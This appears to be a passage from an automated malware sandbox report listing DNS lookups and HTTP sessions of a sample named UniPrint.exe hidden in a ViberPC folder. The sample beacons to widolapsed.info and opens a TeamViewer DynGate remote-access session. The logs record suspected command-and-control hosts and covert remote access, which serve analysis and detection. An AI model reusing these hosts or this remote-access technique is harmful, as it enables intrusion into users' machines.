                                                                                                      Sep 15, 2021 13:45:23.053232908 CEST192.168.2.38.8.8.80x1c63Standard query (0)widolapsed.infoA (IP address)IN (0x0001)

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                      Sep 15, 2021 13:45:18.400454998 CEST8.8.8.8192.168.2.30x4384Name error (3)ping3.dyngate.comnonenoneA (IP address)IN (0x0001)
                                                                                                      Sep 15, 2021 13:45:20.292700052 CEST8.8.8.8192.168.2.30xf98dName error (3)ping3.dyngate.comnonenoneA (IP address)IN (0x0001)
                                                                                                      Sep 15, 2021 13:45:21.047782898 CEST8.8.8.8192.168.2.30x7997No error (0)master12.teamviewer.com185.188.32.22A (IP address)IN (0x0001)
                                                                                                      Sep 15, 2021 13:45:23.120400906 CEST8.8.8.8192.168.2.30x1c63No error (0)widolapsed.info45.153.241.148A (IP address)IN (0x0001)

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • widolapsed.info
                                                                                                      • master12.teamviewer.com
                                                                                                      • 188.172.198.151

                                                                                                      HTTP Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      0192.168.2.34975245.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      1192.168.2.34975345.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      10192.168.2.34976345.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      11192.168.2.34976445.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      12192.168.2.34976545.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      13192.168.2.34977145.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      14192.168.2.34977845.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      15192.168.2.34978945.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      16192.168.2.34980345.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      17192.168.2.34980445.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      18192.168.2.34980545.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      19192.168.2.34980645.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      2192.168.2.34975445.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      20192.168.2.34980745.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      21192.168.2.34980845.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      22192.168.2.34980945.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      23192.168.2.34981045.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      24192.168.2.34981145.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      25192.168.2.34981345.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      26192.168.2.34981745.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      27192.168.2.34981845.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      28192.168.2.34981945.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      29192.168.2.34982045.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      3192.168.2.34975545.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      30192.168.2.34982145.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      31192.168.2.34982245.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      32192.168.2.34982345.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      33192.168.2.34982445.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      34192.168.2.34982545.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      35192.168.2.34982645.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      36192.168.2.34982745.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      37192.168.2.34982845.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      38192.168.2.34982945.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      39192.168.2.34983045.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      4192.168.2.34975645.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      40192.168.2.34983145.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      41192.168.2.34983245.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      42192.168.2.34983345.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      43192.168.2.34983445.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      44192.168.2.349746185.188.32.2280C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Sep 15, 2021 13:45:21.084033966 CEST1051OUTGET /din.aspx?s=00000000&client=DynGate&rnd=37826655&p=10000001 HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: master12.teamviewer.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.104980946 CEST1051INHTTP/1.1 200 OK
                                                                                                      Pragma: no-cache
                                                                                                      Cache-control: no-cache, no-store
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-length: 10
                                                                                                      Data Raw: 17 24 34 30 30 38 32 38 34 39
                                                                                                      Data Ascii: $40082849
                                                                                                      Sep 15, 2021 13:45:21.132512093 CEST1052OUTGET /dout.aspx?s=40082849&p=10000001&client=DynGate&data=FyQSawCjHqkys5MkoZ6aGJqbGZocGBMkoh6YEyagoZ6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyakoh6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyepnqu0txmXGJiTKx6YmpcYFxscG5AoqQ== HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Transfer-Encoding: binary
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: master12.teamviewer.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.153398991 CEST1052INHTTP/1.1 200 OK
                                                                                                      Pragma: no-cache
                                                                                                      Cache-control: no-cache, no-store
                                                                                                      Content-length: 0
                                                                                                      Sep 15, 2021 13:45:21.155066967 CEST1052OUTGET /din.aspx?s=40082849&client=DynGate&p=10000002 HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: master12.teamviewer.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.176011086 CEST1052INHTTP/1.1 200 OK
                                                                                                      Pragma: no-cache
                                                                                                      Cache-control: no-cache, no-store
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-length: 16
                                                                                                      Data Raw: 17 24 13 0b 00 18 20 19 9c 98 98 18 9b 9c 1c 1c
                                                                                                      Data Ascii: $


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      45192.168.2.349747185.188.32.2280C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Sep 15, 2021 13:45:21.207201958 CEST1053OUTGET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: master12.teamviewer.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.228383064 CEST1053INHTTP/1.1 200 OK
                                                                                                      Pragma: no-cache
                                                                                                      Cache-control: no-cache, no-store
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-length: 10
                                                                                                      Data Raw: 17 24 34 30 30 38 32 38 35 39
                                                                                                      Data Ascii: $40082859
                                                                                                      Sep 15, 2021 13:45:21.230412960 CEST1054OUTGET /dout.aspx?s=40082859&p=10000001&client=DynGate&data=FyQS7wAjHqmyuig6sTY0saWyvJMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJqSiHpg8MrGzGjExGLMxmpwbL5ibnBgam5gZGxuTKx6YmpcYFxscG5AoqZMhNLcwuTyegwEAAABSAAApKaCYgAIAAAiAAABb76jy6JCEtP10hWwK5JgAShY7zj+R7R3DOU3+0YZJRajqI5wj4APqnpqJTTfow2rFHUX7lb5rKPxXbMNzymnW3afsLjONOJOSFwYGgTrjCxDXlTyXTROrLUrNxoJ5e0wRdRUaIY3bkkZHP/DCc/GC84acwVg91URMKSdn0IIfWg== HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Transfer-Encoding: binary
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: master12.teamviewer.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.251317978 CEST1054INHTTP/1.1 200 OK
                                                                                                      Pragma: no-cache
                                                                                                      Cache-control: no-cache, no-store
                                                                                                      Content-length: 0
                                                                                                      Sep 15, 2021 13:45:21.256596088 CEST1054OUTGET /din.aspx?s=40082859&client=DynGate&p=10000002 HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: master12.teamviewer.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.277640104 CEST1055INHTTP/1.1 200 OK
                                                                                                      Pragma: no-cache
                                                                                                      Cache-control: no-cache, no-store
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-length: 9
                                                                                                      Data Raw: 17 24 13 04 00 98 20 27 a5
                                                                                                      Data Ascii: $ '


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      46192.168.2.349748185.188.32.2280C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Sep 15, 2021 13:45:21.307344913 CEST1055OUTGET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: master12.teamviewer.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.328543901 CEST1056INHTTP/1.1 200 OK
                                                                                                      Pragma: no-cache
                                                                                                      Cache-control: no-cache, no-store
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-length: 10
                                                                                                      Data Raw: 17 24 34 30 30 38 32 38 36 34
                                                                                                      Data Ascii: $40082864
                                                                                                      Sep 15, 2021 13:45:21.333331108 CEST1056OUTGET /dout.aspx?s=40082864&p=10000001&client=DynGate&data=FyQS8gCjHqmyuim0s7cwujq5MqWyvJMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJqSiHpg8MrGzGjExGLMxmpwbL5ibnBgam5gZGxuTKx6YmpcYFxscG5AoqZMhNLcwuTyegwEAAAASAAApKaCYgAIAAAiAAAB7ySFOURDklGN3FXhtz5fQYcmcXiwT9YXrd7SP4wIu0YyOFYq9yPUEQYpaG7+wnhbl5r+tU8j1VcHRkBZSOJG/A0Y7yY1YSgbi8gOUCGFRO/w26w+YKCZHaxwju7In6AFwX2azSetPIMUWj5HFTKPx6LGZM3a+27DQaxFWt7lD4A== HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Transfer-Encoding: binary
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: master12.teamviewer.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.354281902 CEST1056INHTTP/1.1 200 OK
                                                                                                      Pragma: no-cache
                                                                                                      Cache-control: no-cache, no-store
                                                                                                      Content-length: 0
                                                                                                      Sep 15, 2021 13:45:21.356128931 CEST1057OUTGET /din.aspx?s=40082864&client=DynGate&p=10000002 HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: master12.teamviewer.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.381381035 CEST1057INHTTP/1.1 200 OK
                                                                                                      Pragma: no-cache
                                                                                                      Cache-control: no-cache, no-store
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-length: 9
                                                                                                      Data Raw: 17 24 13 04 00 98 20 27 a5
                                                                                                      Data Ascii: $ '


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      47192.168.2.349749185.188.32.2280C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Sep 15, 2021 13:45:21.420521975 CEST1058OUTGET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: master12.teamviewer.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.441457987 CEST1058INHTTP/1.1 200 OK
                                                                                                      Pragma: no-cache
                                                                                                      Cache-control: no-cache, no-store
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-length: 10
                                                                                                      Data Raw: 17 24 34 30 30 38 32 38 37 33
                                                                                                      Data Ascii: $40082873
                                                                                                      Sep 15, 2021 13:45:21.443578959 CEST1059OUTGET /dout.aspx?s=40082873&p=10000001&client=DynGate&data=FyQS6QChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJbKyuDC2NLsynpiTJjC3M7qws7KetTCTJjSxsrc5sqo8uDKemBMmpKIemDwysbMaMTEYszGanBsvmJucGBqbmBkbG5MnN6ezILG6NLsypbKyuDC2NLsynpgTKTq3OjS2sp6ckym6uDg3uToysiMysLo6uTK5npiTKiGoJ6qqHpgTKx6YmpcYFxscG5AoqQ== HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Transfer-Encoding: binary
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: master12.teamviewer.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.465447903 CEST1059INHTTP/1.1 200 OK
                                                                                                      Pragma: no-cache
                                                                                                      Cache-control: no-cache, no-store
                                                                                                      Content-length: 0
                                                                                                      Sep 15, 2021 13:45:21.467319965 CEST1059OUTGET /din.aspx?s=40082873&client=DynGate&p=10000002 HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: master12.teamviewer.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.488471985 CEST1060INHTTP/1.1 200 OK
                                                                                                      Pragma: no-cache
                                                                                                      Cache-control: no-cache, no-store
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-length: 430
                                                                                                      Data Raw: 17 24 13 a9 01 98 20 27 a5 af 98 98 18 18 18 2f 96 af 99 2f af 98 9c 1c 17 18 9b 99 17 18 9c 9c 17 18 9a 98 9d 1c 18 2f 99 99 18 99 99 af 98 af 96 98 af 98 17 18 17 18 17 18 2f af 98 9c 1a 97 18 9c 1c 17 19 99 17 19 99 2f 98 9c 1a 97 18 9c 1c 17 19 99 17 19 19 2f 98 2f 99 9c 98 98 18 9b 9c 1c 1c 2f 98 af 98 2f 98 2f 98 2f 98 9c 9a 19 9b 9c 9b 9b 19 1a af af 98 9c 1c 17 18 9b 99 17 18 9c 9c 17 18 9a 98 96 18 9a 9c 97 18 99 19 17 18 9c 19 17 19 18 98 16 19 18 99 97 19 19 1b 97 18 9c 1b 17 18 9a 1c 16 19 18 9b 97 18 9a 1b 17 19 19 97 18 9a 19 16 18 9c 1c 17 18 9b 99 17 19 19 99 97 18 9b 9b 16 19 18 99 97 19 19 1b 97 18 9b 19 97 18 99 99 16 18 9b 18 97 18 9a 9b 17 1b 1b 97 18 98 99 16 18 9c 1c 17 18 9b 99 17 19 19 9a 97 18 9a 98 96 19 9b 97 19 1a 99 17 19 19 1a 17 1b 1c 96 19 9b 97 19 1a 99 17 19 1a 1b 97 18 98 1c 96 19 9b 97 19 1a 99 17 19 19 99 17 18 98 1c 16 18 9b 9c 17 19 1a 9a 97 18 9a 9a 97 18 9c 19 96 18 9c 1c 17 18 9b 99 17 19 1a 1a 97 18 99 99 16 19 18 9b 97 18 9a 1b 17 1c 17 1b 99 16 18 9a 9c 97 1c 17 19 19 1c 97 19 19 9b 96 18 9a 9c 17 18 9b 9b 17 1c 1b 17 1c 16 19 18 9b 97 18 9a 1b 17 18 99 97 18 99 9b 16 18 9c 1c 17 18 9b 99 17 18 9c 99 17 18 98 19 16 18 9b 9c 17 19 1a 9a 97 18 9a 9a 17 18 99 9b af b2 b3 17 b1 31 98 33 9a a1 a4 b4 26 36 a8 18 21 a0 a0 a0 a0 af
                                                                                                      Data Ascii: $ '///////////13&6!


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      48192.168.2.349750188.172.198.15180C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Sep 15, 2021 13:45:21.541134119 CEST1060OUTGET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: 188.172.198.151
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.574105978 CEST1060INHTTP/1.1 200 OK
                                                                                                      Pragma: no-cache
                                                                                                      Cache-control: no-cache, no-store
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-length: 17
                                                                                                      Data Raw: 17 24 66 61 73 74 31 32 34 31 38 33 33 39
                                                                                                      Data Ascii: $fast12418339
                                                                                                      Sep 15, 2021 13:45:21.737845898 CEST1061INData Raw: 31
                                                                                                      Data Ascii: 1
                                                                                                      Sep 15, 2021 13:45:21.777873039 CEST1061INData Raw: 32
                                                                                                      Data Ascii: 2
                                                                                                      Sep 15, 2021 13:45:21.823558092 CEST1062INData Raw: 33
                                                                                                      Data Ascii: 3
                                                                                                      Sep 15, 2021 13:45:21.865210056 CEST1062OUTPOST /dout.aspx?s=12418339&p=10000002&client=DynGate HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Transfer-Encoding: binary
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: 188.172.198.151
                                                                                                      Content-Length: 500000
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.865288973 CEST1062OUTData Raw: 17 24 10 04 00 d0 3a a7 0b
                                                                                                      Data Ascii: $:
                                                                                                      Sep 15, 2021 13:45:21.903194904 CEST1063OUTData Raw: 17 24 0a 20 00 50 3a a7 0b 88 13 80 00 00 00 00 00 01 00 00 00 11 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                      Data Ascii: $ P:
                                                                                                      Sep 15, 2021 13:45:21.903299093 CEST1063OUTData Raw: 17 24 28 18 00 00 80 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                      Data Ascii: $(X
                                                                                                      Sep 15, 2021 13:45:21.903404951 CEST1063OUTData Raw: 17 24 2e 39 00 00 00 00 00 a0 75 4e 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 23 03 01 04 00 00 00 01 00 00 00 03 04 00 00 00 a0 75 4e 17 04 08 00 00 00 04 00 00 00 a0 75 4e 17
                                                                                                      Data Ascii: $.9uN#uNuN
                                                                                                      Sep 15, 2021 13:45:22.295255899 CEST1064OUTData Raw: 17 24 2e 78 00 00 00 00 00 a0 75 4e 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 08 01 04 00 00 00 07 00 00 00 02 06 00 00 00 6a 00 61 00 00 00 03 02 00 00 00 00 00 04 04 00 00 00 a0 75 4e 17 05 18 00 00 00 31 00 35 00 2e 00 30 00 2e 00
                                                                                                      Data Ascii: $.xuN&jauN15.0.687 QSQS'
                                                                                                      Sep 15, 2021 13:45:22.295335054 CEST1064OUTData Raw: 17 24 2e 78 00 00 00 00 00 a0 75 4e 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 08 01 04 00 00 00 01 00 00 00 02 06 00 00 00 6a 00 61 00 00 00 03 02 00 00 00 00 00 04 04 00 00 00 a0 75 4e 17 05 18 00 00 00 31 00 35 00 2e 00 30 00 2e 00
                                                                                                      Data Ascii: $.xuN&jauN15.0.687 QSQS'
                                                                                                      Sep 15, 2021 13:45:22.295448065 CEST1064OUTData Raw: 17 24 2e 78 00 00 00 00 00 a0 75 4e 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 08 01 04 00 00 00 04 00 00 00 02 06 00 00 00 6a 00 61 00 00 00 03 02 00 00 00 00 00 04 04 00 00 00 a0 75 4e 17 05 18 00 00 00 31 00 35 00 2e 00 30 00 2e 00
                                                                                                      Data Ascii: $.xuN&jauN15.0.687 QSQS'
                                                                                                      Sep 15, 2021 13:45:22.295531034 CEST1064OUTData Raw: 17 24 2e 78 00 00 00 00 00 a0 75 4e 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 08 01 04 00 00 00 05 00 00 00 02 06 00 00 00 6a 00 61 00 00 00 03 02 00 00 00 00 00 04 04 00 00 00 a0 75 4e 17 05 18 00 00 00 31 00 35 00 2e 00 30 00 2e 00
                                                                                                      Data Ascii: $.xuN&jauN15.0.687 QSQS'
                                                                                                      Sep 15, 2021 13:45:47.900626898 CEST2462OUTData Raw: 17 24 1b 00 00
                                                                                                      Data Ascii: $
                                                                                                      Sep 15, 2021 13:46:12.900603056 CEST7189OUTData Raw: 17 24 1b 00 00
                                                                                                      Data Ascii: $


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      49192.168.2.349751188.172.198.15180C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Sep 15, 2021 13:45:21.703310013 CEST1061OUTPOST /dout.aspx?s=12418339&p=10000001&client=DynGate HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Transfer-Encoding: binary
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: 188.172.198.151
                                                                                                      Content-Length: 3
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Sep 15, 2021 13:45:21.703459024 CEST1061OUTData Raw: 31
                                                                                                      Data Ascii: 1
                                                                                                      Sep 15, 2021 13:45:21.743161917 CEST1061OUTData Raw: 32
                                                                                                      Data Ascii: 2
